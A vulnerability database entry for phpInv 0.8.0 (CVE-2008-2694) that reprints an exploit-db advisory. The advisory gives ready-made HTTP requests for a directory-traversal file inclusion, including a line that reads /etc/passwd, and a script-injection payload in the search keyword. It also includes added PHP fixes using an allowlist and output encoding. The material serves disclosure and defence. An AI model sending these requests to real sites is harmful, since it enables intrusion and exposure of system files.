phpInv search.php cross-site scripting vulnerability

Vulnerability ID: 1115371    Type: Cross-site scripting
Published: 2008-06-08    Updated: 2009-04-14
CVE ID: CVE-2008-2694    CNNVD ID: CNNVD-200806-196
Platform: PHP    CVSS score: 4.3
|Source
https://www.exploit-db.com/exploits/5754
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-196
|Details
A cross-site scripting vulnerability exists in search.php in phpInv 0.8.0. Remote attackers can inject arbitrary web script or HTML via the keyword parameter.
|Exploit
=========================================================
 PHPInv 0.8.0 (LFI/XSS) Multiple Remote Vulnerabilities
=========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 8 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : PHPInv
 VERSION     : 0.8.0
 DOWNLOAD    : http://sourceforge.net/projects/phpinv
#####################################################

---LFI---

##############################################
Vulnerable: entry.php (?action=)

43:	if (isset($action) & !isset($noconfirm)) {
44:		include("inc/entry_$action.php");
45:	}

###############################################

---Description---

   Use a web proxy (WebScarab, Burp Proxy, etc...) to intercept the URI -> 
http://[target]/[phpinv_path]/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=test

   Then you can change the details of the GET request for this URI, for example:

[-]GET http://192.168.1.103:80/phpinv/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=/../../../../../phpinfo HTTP/1.1
[-]Accept: */*
[-]User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[-]Host: 192.168.1.103
[-]Connection: Close
[-]Pragma: no-cache

   Now you can see phpinfo.php in the PHPInv page...  :) 

Tip!! http://192.168.1.103:80/phpinv/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=/../../../../../etc/passwd%00 HTTP/1.1
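The root cause of the LFI above is that a request-controlled string is concatenated into include() without restriction. The block below is an added example, not phpInv's own code: a hardened replacement for the entry.php include pattern that maps the action parameter through an exact-match allowlist, so traversal sequences, null bytes and stream wrappers never reach include(). The handler names in $allowed_actions are assumed; substitute the files that actually exist in inc/.

```php
<?php
// Added example, not phpInv's own code: hardened version of the
// entry.php include pattern quoted in the advisory.

$allowed_actions = ['add', 'edit', 'delete', 'view'];   // assumed handler names

/**
 * Map a request-supplied action to a handler path, or return null.
 * Exact-match allowlisting (strict comparison) means no traversal,
 * null-byte or wrapper trick can produce a path outside inc/.
 */
function resolve_entry_handler(string $action, array $allowed): ?string
{
    if (!in_array($action, $allowed, true)) {
        return null;
    }
    return __DIR__ . '/inc/entry_' . $action . '.php';
}

// Read the parameter explicitly instead of relying on register_globals.
$action    = isset($_GET['action']) ? (string) $_GET['action'] : '';
$noconfirm = isset($_GET['noconfirm']);

if ($action !== '' && !$noconfirm) {
    $handler = resolve_entry_handler($action, $allowed_actions);
    if ($handler === null) {
        http_response_code(400);
        exit('Unknown action');
    }
    include $handler;
}

// Quick check when run from the CLI: the advisory's inputs are rejected,
// a legitimate action resolves to a path inside inc/.
if (PHP_SAPI === 'cli') {
    $probes = ['view', '/../../../../../phpinfo', "/../../../../../etc/passwd\0"];
    foreach ($probes as $probe) {
        $resolved = resolve_entry_handler($probe, $allowed_actions);
        printf("%-32s => %s\n", addcslashes($probe, "\0"), $resolved ?? 'rejected');
    }
}
```

Note that the null-byte truncation used in the "Tip" line stops working on PHP 5.3.4 and later, where paths containing a NUL are rejected by the filesystem functions, but the traversal without it still works on any version; the allowlist closes both regardless of PHP version, whereas blacklisting "../" or stripping NUL bytes does not.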


---XSS---

[+]search.php (keyword)

GET http://192.168.1.103:80/phpinv/search.php?hash=19e9abf204087d0765f81c5bfb1a6fef&keyword=>"><script>alert(123);</script>&categoryid=1&action=Search HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 192.168.1.103
Connection: Close
Pragma: no-cache
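The XSS works because search.php reflects the keyword parameter into the results page unencoded, so the payload's leading >" closes the attribute it lands in. The block below is an added example, not phpInv's own code: output encoding applied at every point where the keyword is reflected. The markup (an input field and a heading) is assumed; the principle is that the encoding must match the HTML context the value is inserted into.

```php
<?php
// Added example, not phpInv's own code: context-aware output encoding
// for the keyword parameter reflected by search.php.

/** Encode a value for insertion into HTML element text or a quoted attribute. */
function e(string $value): string
{
    // ENT_QUOTES encodes both ' and ", so the value cannot close an attribute;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$keyword = isset($_GET['keyword']) ? (string) $_GET['keyword'] : '';

// Vulnerable form (what the advisory exploits): the raw value is reflected.
//   echo '<input type="text" name="keyword" value="' . $keyword . '">';

// Hardened form: every reflection passes through e(), in both contexts used.
echo '<input type="text" name="keyword" value="' . e($keyword) . '">', "\n";
echo '<h2>Results for ' . e($keyword) . '</h2>', "\n";

// Quick check when run from the CLI: the advisory's payload becomes inert text.
if (PHP_SAPI === 'cli') {
    echo e('>"><script>alert(123);</script>'), "\n";
}
```

htmlspecialchars() is the right tool only for element text and quoted attribute values. A keyword placed inside a script block, an inline event handler or a URL needs the encoding appropriate to that context (JSON encoding, or rawurlencode() for a query-string component), and unquoted attributes should be avoided altogether.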


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-08]
|References

Source: XF
Name: phpinv-search-xss(42928)
Link: http://xforce.iss.net/xforce/xfdb/42928
Source: BID
Name: 29597
Link: http://www.securityfocus.com/bid/29597
Source: MILW0RM
Name: 5754
Link: http://www.milw0rm.com/exploits/5754